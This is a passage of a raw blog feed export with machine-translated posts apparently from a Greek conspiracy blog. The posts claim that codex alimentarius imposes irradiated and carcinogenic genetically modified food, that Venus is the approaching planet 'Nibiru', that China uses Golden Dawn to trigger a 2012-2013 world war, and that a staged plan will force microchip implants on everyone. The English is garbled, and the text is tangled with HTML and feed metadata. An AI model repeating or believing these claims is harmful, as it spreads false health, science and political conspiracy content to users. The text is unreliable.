AND ANKARA,AT THE 25th ARMOURED UNIT AT XANTHI (NORTH
GREECE)!!!!!.ADDRESSED TO ALL OFFICERS OF THE THREE CORPS!!!!. </a>
</h3>
<h3 class="post-title entry-title" itemprop="name">
</h3>
</div>
<div style="text-align: justify;">
<a href="http://hellenandchaos.blogspot.ca/2012/11/2nd-ultra-urgent-sos-american-pentagon.html">http://hellenandchaos.blogspot.ca/2012/11/2nd-ultra-urgent-sos-american-pentagon.html </a></div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-22414002753074559432012-11-21T20:15:00.004+01:002012-11-21T20:20:20.269+01:00Eat irradiated products #AWAKEN #FOOD<h3 class="post-title entry-title" itemprop="name">
Eat irradiated products </h3>
<div class="post-body entry-content" id="post-body-1007252971836647262" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div class="post-header">
<div class="post-share">
<span class="post-share-fb mysprite"></span><span class="post-share-tw mysprite"></span><span class="post-share-gg mysprite"></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheSw3VURwU-3Jx7dsArh9OQWiR2QwY9InGf0KONLyAGalFbgYnv8rgyZrIh-4v13hX45FkZNRKwXPkGH5NYDF-mVbntK4OXgvKZhm5dDAssbTRv9Msreav41yrakkxpmhKX13iaaa2a34J/s560/trome-aktinobolimena-proionta.jpg" title="Eat irradiated products" width="560" /></div>
<span style="font-size: large;">Lately made great fuss with codex alimentarius and circulated a
photograph potatoes with the planting of the hybrid because it is
consistent with the <b>codex alimentarius,</b> which prohibits replanting seeds.</span><span style="font-size: large;">
These seeds are genetically modified to prevent fruit production for
the second year and of course responsible for carcinogenicity according
to surveys.</span><br />
<span style="font-size: large;"> </span><br />
<span style="font-size: large;"><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a> What we have not understood is that the codex alimentarius here for years, but we did not want to see.</span><br />
<span style="font-size: large;"> </span> <br />
<span style="font-size: large;"> I have one in my kitchen shelf filled with spices and try to find purest products as I can. Of course I could not find that necessarily buy from shops and some few of supermarkets.</span><br />
<span style="font-size: large;"> </span> <br />
<span style="font-size: large;"> I discovered something I had coriander seeds long (I used grated lately) so I got a mill to use.</span><br />
<span style="font-size: large;"> </span> <br />
<span style="font-size: large;"> With surprise I realized that reading the label is irradiated product!</span> <br />
<span style="font-size: large;"> According to the codex alimentarius nutrients a product should be limited to 15% to be safe for our health! To achieve this you must either be from <b>genetically modified</b> seeds suitable, or irradiated!</span> <br />
<span style="font-size: large;"> Let us not believe everything around us pure, even if it coriander seeds. We should be most suspicious of anything more and read better "fine print" because they hide truths. Can not write "consistent with the standards of codex alimentarius" like other products but implies.</span><br />
<span style="font-size: large;"> </span> <br />
<span style="font-size: large;"> Having photographed the packaging, I threw in the trash, I thought to put in compost but regretted it because it is dangerous!</span><br />
<span style="font-size: large;"> </span> <br />
<span style="font-size: large;">
At the first opportunity I will go to this supermarket to talk with the
manager and complain about the junk foisted on us in the guise of pure
products. I have no illusions that this will happen only one must "hear them."</span><br />
</div>
</div>
<div class="post-footer">
<div class="post-footer-line post-footer-line-1">
<span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhiEWbzBH70vjyxVmEioUW5C1zHthg" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span><br />
<br />
<span class="post-icons"><span class="item-action"> <span style="font-size: large;"><b>Original in greek written </b></span></span></span><br />
<h3 class="title">
<b><span style="font-weight: normal;"><span><a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.com/&usg=ALkJrhgLJJSdiRa9S89oeghUX-oksp4hGQ">http://iceujininfos.blogspot.com</a></span></span></b></h3>
<b><a href="http://iceujininfos.blogspot.nl/">http://iceujininfos.blogspot.nl</a></b><div class="descriptionwrapper">
<h3 class="description">
<b><span style="font-weight: normal;"> <span><a href="http://ellinwnegersi.blogspot.com/"><span>http://ellinwnegersi.blogspot.com</span></a></span></span></b> </h3>
</div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-35951023318488856112012-11-21T20:09:00.000+01:002012-11-21T20:20:28.172+01:00Quarantined half Greece for fear malaria #VIRUS #EU<h2 class="date-header">
Sunday, November 18, 2012 </h2>
<div class="date-posts">
<div class="post-outer">
<div class="post hentry" itemscope="itemscope" itemtype="http://schema.org/BlogPosting">
<a href="http://www.blogger.com/blogger.g?blogID=2615012028595202594" name="736471582653469916"></a><br />
<h3 class="post-title entry-title" itemprop="name">
Quarantined half Greece for fear malaria! </h3>
<div class="post-body entry-content" id="post-body-736471582653469916" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<span style="color: #3d85c6;"><span style="background-color: black; font-size: x-small;"><br /></span></span> <br />
<div class="separator" style="clear: both; font-weight: bold; line-height: 17.2727px; text-align: center;">
<img border="0" src="http://3.bp.blogspot.com/-KH-LN76_gEI/UKeQAUbIUtI/AAAAAAABNIQ/Ei4FFQr8hJw/s400/45a3136e15c7137832f265627341b851_XL.jpg" /> </div>
<span style="color: #6fa8dc;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><br style="font-weight: bold; line-height: 17.2727px;" /></span></span> </span><br />
<div style="font-weight: bold; line-height: 17.2727px; text-align: justify;">
<span style="color: #6fa8dc;"> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">Quarantine
has been in Greece for fear of malaria, while causing alarm in sections
donations to hospitals because of the outbreak.</span></span> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">That is why we will continue until February exclusion ten municipalities of Attica and several of the region.</span></span></span> </div>
<div style="font-weight: bold; line-height: 17.2727px; text-align: justify;">
<span style="color: #6fa8dc;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><br /><a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://enwtheite.blogspot.gr/2012/11/blog-post_6106.html%3Futm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed:%2Bblogspot/rsgzE%2B%28%2522%25CE%2597%2B%25CE%2599%25CE%25A3%25CE%25A7%25CE%25A5%25CE%25A3%2B%25CE%2595%25CE%259D%2B%25CE%25A4%25CE%2597%2B%25CE%2595%25CE%259D%25CE%25A9%25CE%25A3%25CE%2595%25CE%2599%2522%29&usg=ALkJrhgAMlWTnAjs7OBu1MUFBiTP6TNENQ" name="more"></a></span></span></span> </div>
<span style="color: #6fa8dc;"> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">As
the Espresso, high risk areas are also characterized by municipalities
Eurotas Laconia Abdera Xanthi Sofadon Karditsa areas in Viotia and
Evros.</span></span> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a></span></span> </span><br />
<div>
<span style="color: #6fa8dc;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><br /></span></span></span> </div>
<span style="color: #6fa8dc;"> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">According
to the Epidemiological Report KEELPNO from 01/01/2012 until 22/10/2012
and diagnosed in a total of 75 cases of malaria Greece, of which 59 were
imported, ie 53 were immigrants from endemic countries and six Greek
travelers.</span></span> </span><br />
<div>
<span style="color: #6fa8dc;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><br /></span></span></span> </div>
<span style="color: #6fa8dc;"> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">Meanwhile
remains in the exclusion of donors for fear of malaria in
municipalities Kropia, Vari-Voula-Vouliagmeni Saronic Markopoulos
Peania, Lavrio, Marathon, Spata - Artemis and Rafina - Pikermi and
Oropou.</span></span> </span><br />
<div>
<span style="color: #6fa8dc;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;"><br /></span></span></span> </div>
<span style="color: #6fa8dc;"> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">Malaria is an infectious disease transmitted primarily through bite of infected mosquitoes.</span></span> <span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: black; font-size: x-small;">The symptoms are severe chills, high fever, sweating, malaise, headache and myalgia.</span></span> </span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #3d85c6;"><span style="background-color: black; font-size: x-small;"><br /></span></span></span> </div>
</div>
</div>
<div class="post-footer">
<div class="post-footer-line post-footer-line-1">
<span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhiEWbzBH70vjyxVmEioUW5C1zHthg" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span><br />
<br />
<span class="post-icons"><span class="item-action"> <span style="font-size: large;"><b>Original in greek written </b></span></span></span><br />
<h3 class="title">
<b><span style="font-weight: normal;"><span><a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.com/&usg=ALkJrhgLJJSdiRa9S89oeghUX-oksp4hGQ">http://iceujininfos.blogspot.com</a></span></span></b></h3>
<b><a href="http://iceujininfos.blogspot.nl/">http://iceujininfos.blogspot.nl</a></b><div class="descriptionwrapper">
<h3 class="description">
<b><span style="font-weight: normal;"> <span><a href="http://ellinwnegersi.blogspot.com/"><span>http://ellinwnegersi.blogspot.com</span></a></span></span></b> </h3>
</div>
<span class="post-icons"><a href="http://www.blogger.com/email-post.g?blogID=7123050054995479129&postID=736471582653469916" title="Email Post"><span class="item-action"><span style="color: black;"></span></span></a></span></div>
</div>
</div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-37659811483844117862012-11-21T19:54:00.001+01:002012-11-21T20:20:58.242+01:00ELEFSIS 1 - Planet-X (Gorgoneion) #NIBIRU #NO<h3 class="post-title entry-title" itemprop="name">
</h3>
<h3 class="post-title entry-title" itemprop="name">
</h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/1-planet-x.html&usg=ALkJrhj2-RpNg3c9EJI_80jpngARclXBfA">ELEFSIS 1 - Planet-X (Gorgoneion)</a></h3>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://iceujininfos.blogspot.com/2012/11/1-planet-x.html">ΕΛΕΥΣΙΣ 1 - Planet-X (Γοργόνειο)</a>
</h3>
<div class="post-header">
</div>
<div class="post-header">
<div class="post-share">
<span class="post-share-fb mysprite"></span><span class="post-share-tw mysprite"></span><span class="post-share-gg mysprite"></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGOVilCncZehKbz9EBo28yJXL-lGPosR1Cy2OmyDWA3DdMxmlMeU2ci0IGXfL5kZsl0JxXeP_bfK6SfyRuot_hAIPVAxCBjbHHrKSqprRjirFfqxCMquKkqpTMV4z_IK9hb2OGv_fp6NmC/s560/planet-x-gorgoneio.jpg" title="ΕΛΕΥΣΙΣ 1 - Planet-X (Γοργόνειο)" width="560" /></div>
<br />
Look at 20.30-23.00 West will see with the naked eye! (Winter hours or command signals of the object is 05.00-05.30. <b>NASA</b> says it is the planet Venus.'s Youtubers-observers to disprove. <br />
<br />
<a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a> The Bronze planitiskos Athena increasingly approaching ... The observation was made 06/06/2010. I suspect ... The ancient Athenians 5,000 years ago saw the same sight over Eleusis (west of Athens) - and gave this name <b>(Elefsis</b> <i>COMING</i> =) <br />
<br />
ESSETAI Ellanikou IMAR<br />
<br />
Κοιτάξτε Δυτικά στις 20.30-23.00 θα το δείτε και με γυμνό μάτι! (τον
χειμώνα ή ώρα αντολής του αντικειμένου είναι 05.00-05.30. Η <b>ΝΑΣΑ</b> λέει οτι είναι ο πλανήτης Αφροδίτη. Οι youtubers-παρατηρητές την διαψεύδουν.<br />
<br />
<a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a>
Ο Χάλκινος πλανητίσκος της Αθηνάς όλο και πλησιάζει... Η Παρατήρηση
έγινε 6-6-2010. Υποπτεύομαι... οι αρχαίοι Αθηναίοι έβλεπαν πριν 5.000
χρόνια το ίδιο θέαμα πάνω από την Ελευσίνα (Δυτικά της Αθήνας) - και της
έδωσαν αυτό το όνομα (<b>Έλευσις</b>=<i>ΕΡΧΟΜΟΣ</i>) <br />
EΣΣΕΤΑΙ ΕΛΛΑΝΙΩΝ ΗΜΑΡ
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/eZjN0rCrUbk" width="560">R</iframe><br />
<br />
RA Says:<br />
<span style="font-size: large;"><span style="color: #3d85c6;"> and here is your nibiru (The Real Blue Kachina, an Earth-sized White Dwarf from the Pinwheel Galaxy, called 'Nibiru'=PTF11kly=SN2011fe and 21 Million lightyears from Gaia for September 12th, 2011) http://www.thuban.spruz.com/gfile/75r4!-!GKLGHE!-!zrzor45!-!KJHHRLGE-NHFF-HESR-MRHM-DMDFJQQHNGOR!-!72y1nq/supernova_1991364b.jpg Nibiru'=PTF11kly=SN2011fe </span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.thuban.spruz.com/gfile/75r4!-!GKLGHE!-!zrzor45!-!KJHHRLGE-NHFF-HESR-MRHM-DMDFJQQHNGOR!-!72y1nq/supernova_1991364b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://www.thuban.spruz.com/gfile/75r4!-!GKLGHE!-!zrzor45!-!KJHHRLGE-NHFF-HESR-MRHM-DMDFJQQHNGOR!-!72y1nq/supernova_1991364b.jpg" width="640" /></a></div>
<span style="font-size: large;"><span style="color: #3d85c6;">vs triangle , left pleadian, rigthside sirius, top arcturus, now, this object in movement, in sagiratuius moving into that triangle part of space. RA RA RA </span></span><div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-42641432831876762252012-11-21T19:52:00.000+01:002012-11-21T20:21:51.357+01:00Do today what you can not create tomorrow mentally waisted #WORK @SELF REMEMBER THYSELF LoveThySelf OneSelf RA RA RA<h3 class="post-title entry-title" itemprop="name">
<a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/blog-post_2267.html&usg=ALkJrhioEWYnL7UZaNF5YDNI9Sppk_ELlg"> Do today what you can not create tomorrow mentally waisted</a> </h3>
<div class="post-body entry-content" id="post-body-68344653617629111" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div class="post-header">
<div class="post-share">
<span style="color: #3d85c6;"><span class="post-share-fb mysprite"></span><span class="post-share-tw mysprite"></span><span class="post-share-gg mysprite"></span></span> </div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #3d85c6;"><img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglVmNiEsM8_YmaBwrozOZlJLyMdsO_K0cYiBEkDpN4-EeFiwi4GAZj0kg8bNyIgT0RxeHYwLQPqpenGsSQoBNZcwESnTrjfC1vJ1EvMk7njUq8DzzOLKymyQBHi3HcM7zn04tiEhnNqrDI/s560/psixika-apovlita.jpg" title="Do today what you can to not create waste mentally tomorrow" width="560" /></span> </div>
<span style="color: #3d85c6;">Consider what will happen tomorrow, sometimes with fear, sometimes with impatience.</span> <span style="color: #3d85c6;">Reminiscing about the good times of the past with nostalgia.</span> <span style="color: #3d85c6;">Thoughts for the future ... Thoughts about the past ... Thoughts ..</span> <span style="color: #3d85c6;">Thoughts ...</span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;"><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a></span> <u><b><span style="color: #3d85c6;">Today is when we experience it?</span></b></u> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">The man on the basis of the potential of not being able to perceive time.</span> <span style="color: #3d85c6;">Attempted to "conquer", creating units of time (hour, minute, second), with their respective devices (clock, calendar) but <i>time</i> was always a "step" ahead ..</span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">The perception of humans to higher consciousness became unable to "separate" the time into three parts: <b>past, present and future.</b></span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">Based
on the above trisection see, being people, that today we are moving
from the present to the future with fear of the "unknown" recollecting
the moments of the past that gave us emotional security.</span> <span style="color: #3d85c6;">That 'daydream', thus lacking "solid foundation."</span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">This situation makes us infinite to negative thoughts and emotions to become unhappy polluting the environment we live in <b>Psychic Waste.</b></span> <span style="color: #3d85c6;">In essence, what we are really present and not rejoice.</span> <br />
<span style="color: #3d85c6;">The secret to "conquer" the <b>time</b> is to live in the present, act in this, act with precision.</span> <span style="color: #3d85c6;">The
more accurate the time we do, the more we act in the now, so we become
more efficient and happier because we fulfill our aspirations and our
dreams.</span> <span style="color: #3d85c6;">Wear watches, schedule your day, do not let you beat <b>boredom!</b></span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">It's easy enough to decide!</span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">Happiness is not the fear of the unknown or the blurred memory of the past.</span> </div>
<div dir="ltr" style="text-align: left;">
<br />
<span style="color: #3d85c6;">NOW we deserve happiness.</span></div>
<div dir="ltr" style="text-align: left;">
<span style="color: #3d85c6;"> </span> </div>
</div>
<div class="post-footer">
<span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhiEWbzBH70vjyxVmEioUW5C1zHthg" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span><br />
<br />
<span class="post-icons"><span class="item-action"> <span style="font-size: large;"><b>Original in greek written </b></span></span></span><br />
<h3 class="title">
<b><span style="font-weight: normal;"><a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.com/&usg=ALkJrhgLJJSdiRa9S89oeghUX-oksp4hGQ">http://iceujininfos.blogspot.com</a></span></b></h3>
<b><a href="http://iceujininfos.blogspot.nl/">http://iceujininfos.blogspot.nl</a></b><br />
<div class="descriptionwrapper">
<h3 class="description">
<b><span style="font-weight: normal;"> <a href="http://ellinwnegersi.blogspot.com/">http://ellinwnegersi.blogspot.com</a></span></b> </h3>
</div>
<div class="post-footer-line post-footer-line-3">
<table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"><tbody>
<tr><td class="reactions-label-cell" nowrap="nowrap" valign="top" width="1%"><br /></td><td><br /></td></tr>
</tbody></table>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-21694544892946588782012-11-10T15:51:00.002+01:002012-11-10T15:51:48.595+01:00The provocative role of Golden Dawn in WWIII<a href="http://www.blogger.com/blogger.g?blogID=2615012028595202594" name="9202027220229923805"></a>
<h3 class="post-title entry-title" itemprop="name">
<b><span style="font-size: x-small;"><span style="font-size: small;">HELLEN and CHAOS - G.H.REES Andromedian Portal <br />True Geostrategics & Astrostrategics
</span></span></b></h3>
<h4 class="date-header">
Thursday, November 8, 2012</h4>
<div class="post-header">
</div>
<div dir="ltr" style="text-align: left;">
<br />
Nazis in 1930-1945 and todays neonazi Golden Dawn London+Greece, are a
puppet - instrument of Dragonian China..hyperlodge HONG left hand path,
and of subordinate Black Brotherhood of mongolian Tibet (Tamil Forces).<br />
That is why Karl Haushoffer geopolitical brain of Nazism and teacher of
Hitler, was initiated as a Golden Dawn Berlin mason - magician
invocating draconian demonic 4D spirits and also initiated in Tamil
Buddism in Tibet (ZEN) and ZEN of Japan. (Green Dragons)<br />
That is why hebrew Lincoln Von Trebits who saved Hitler's life in 1920,
Trebits was initiated as a mandarin in the highest Masonic Chinese
overlodge HONG (See book: Nazism Secret Society)<br />
That is why one security garrison of Berlin had Tibetan ZEN Monks as
their members. They were executed as "enemy spies" by the Soviets in
1945. (See Green Dragon ZEN hyperlodge obedient to HONG)<br />
Dragonian initiated Nazi mason Geopolitik Haushoffer and todays Golden
Dawn Greece doctrine was and is: DRAG NACH OSTEN = Push to the East.<br />
That is why Golden Dawn claims Constantinople as the next capital of the
Greek NeoByzantine "Empire 666"..in order through NATO to entrap Greece
into a new minor asia campaign push to the East-Anatolia (See
historical repetition of minor asia destruction in 1922) now against the
Shangai Pact and against China.<br />
That is, China 888 is using Nazi Golden Dawn DRAG NACH OSTEN 666 as its
provocative in collusion western instrument - push to the East, against
China(!!!) in order for China to find the alibi to masively
counterattack and devastate the West in Armageddon or WWIII 2012-2013.<br />
See Doctrine of Tiger(West) and Dragon(China). Dragon waits and
enorchestrates the provocation attack of Tiger. Then Dragon
counterattacks and win.
<br />
<br />
Follow G.H.REES documents:
<br />
<br />
<a href="http://hellenandchaos.blogspot.gr/2012/11/the-truth-behind-nazi-salute-greek.html">http://hellenandchaos.blogspot.gr/2012/11/the-truth-behind-nazi-salute-greek.html</a>
<br />
<br />
also interesting read:
<br />
<br />
<a href="http://www.berzinarchives.com/web/en/archives/advanced/kalachakra/shambhala/nazi_connection_shambhala_tibet.html">http://www.berzinarchives.com/web/en/archives/advanced/kalachakra/shambhala/nazi_connection_shambhala_tibet.html</a></div>
<div dir="ltr" style="text-align: left;">
</div>
<div dir="ltr" style="text-align: left;">
<div id="header-wrapper">
<div class="header section" id="header">
<div class="widget Header" id="Header1">
<div id="header-inner">
<blockquote class="tr_bq">
<div class="titlewrapper">
<div class="title">
<br />
<h3 class="post-title entry-title" itemprop="name">
<a href="http://hellenandchaos.blogspot.ca/2012/11/the-provocative-role-of-golden-dawn-in.html">The provocative role of Golden Dawn in WWIII</a></h3>
</div>
</div>
</blockquote>
<div class="descriptionwrapper">
<blockquote>
<div class="description">
<span style="font-size: small;"><i>All truths pass through three phases.
First it is ridiculed. Second it is violently opposed. Third it is
accepted as self evident. Follow the mitos of Hellenic wisdom: Gnōthi
seautón="Know Thyself",Mēdén ágan="Nothing in
Excess"-Delphi(Civilization Matrix)Oracle, Aghivasien métra="Live in
harmony with Natural Laws"-Heracletos. In today's Chaos there is only
one way of Order Restoration: Pan-Hellenism.</i></span></div>
</blockquote>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-87092038425116522282012-11-09T15:44:00.001+01:002012-11-09T15:44:48.128+01:0012 steps to accept all people the chip under the skin<h3 class="post-title entry-title" itemprop="name">
<span><br /></span> </h3>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div class="post-header">
<div class="post-share">
<span class="post-share-fb mysprite"></span><span class="post-share-tw mysprite"></span><span class="post-share-gg mysprite"></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuJ6WKQrsrHWbLId_enKYafSEarKhZYRxSjYpEUIJAAjFAOj1MYwNhpF0Am_3ff1aGxtTJzvJC0a5ST9TNvdwH6N2KWlzp3caVr-3zNEa_4pd3pczz8EaI1ZVUABfdK0UeJJWJxpZ-tqve/s640/veri-chip-dark.png" title="chip" width="540" /></div>
<span> Get Mind Smart / RED SKY</span></div>
<div dir="ltr" style="text-align: left;">
<h3 class="post-title entry-title" itemprop="name">
<span>12 steps to accept all people the chip under the ski </span></h3>
<span> </span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> We are the last generation to have a voice and <em>free will</em> and we can change the course of history.</span> <span>
Today everyone connected everywhere - the 'smart phones' (smart phones)
will become the tools of Smart World Order, abolishing cash, the keys,
driving license, etc. The purpose is also to be used daily as the new
identity' reliable 'online community.</span> <br /><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a> <span> Then the phone or the <strong>chip</strong>
associated with the ID of the user of the phone, an object is very
valuable to be lost and the only safe place now is under the skin ...</span> <br /> <span> See the video of Master Card for the "revolution" of payment via mobile phones around the world!</span> <span>
As shown in the video, all over the world have abolished money and
people "happy and liberated" pay now, with cell phones, and even folk.</span> <span> "What's the next step?" He asks at the end, the narrator of the video.</span> <span> "Stay Connected why only now begun ...".</span> </div>
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/8y_-sKf-2Aw/0.jpg"><param name="movie" value="http://www.youtube.com/v/8y_-sKf-2Aw&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/8y_-sKf-2Aw&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<div dir="ltr" style="text-align: left;">
<br /></div>
<span> The thing goes like this: </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>1.</span> <span> Create a climate of fear.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>2.</span> <span> Make them all to be online.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>3.</span> <span> Do so and every poor have more of a mobile phone.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>4.</span> <span> Ask everyone to talk about RFID and biometrics: the first stage for the acceptance of something is the expectation.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>5.</span> <span> Put chip in so many more things and people as you can (phones, pets, clothes, etc.) to indicate that something is "normal".</span> </div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span> 6.</span> <span> Promote a system of global identity, but do it slowly.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>7.</span> <span> Forward implants for health and safety, so that everyone thinks that is a good thing.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>8.</span> <span> Make so that they can use their phone for everything, especially as a means of payment and proof of identity.</span> <span> 9.</span> <span> How do we know you're really? Biometric your items please!</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>10.</span> <span> Cyber-attack!</span> <span> Revolution!</span> <span> Please, protect us!</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
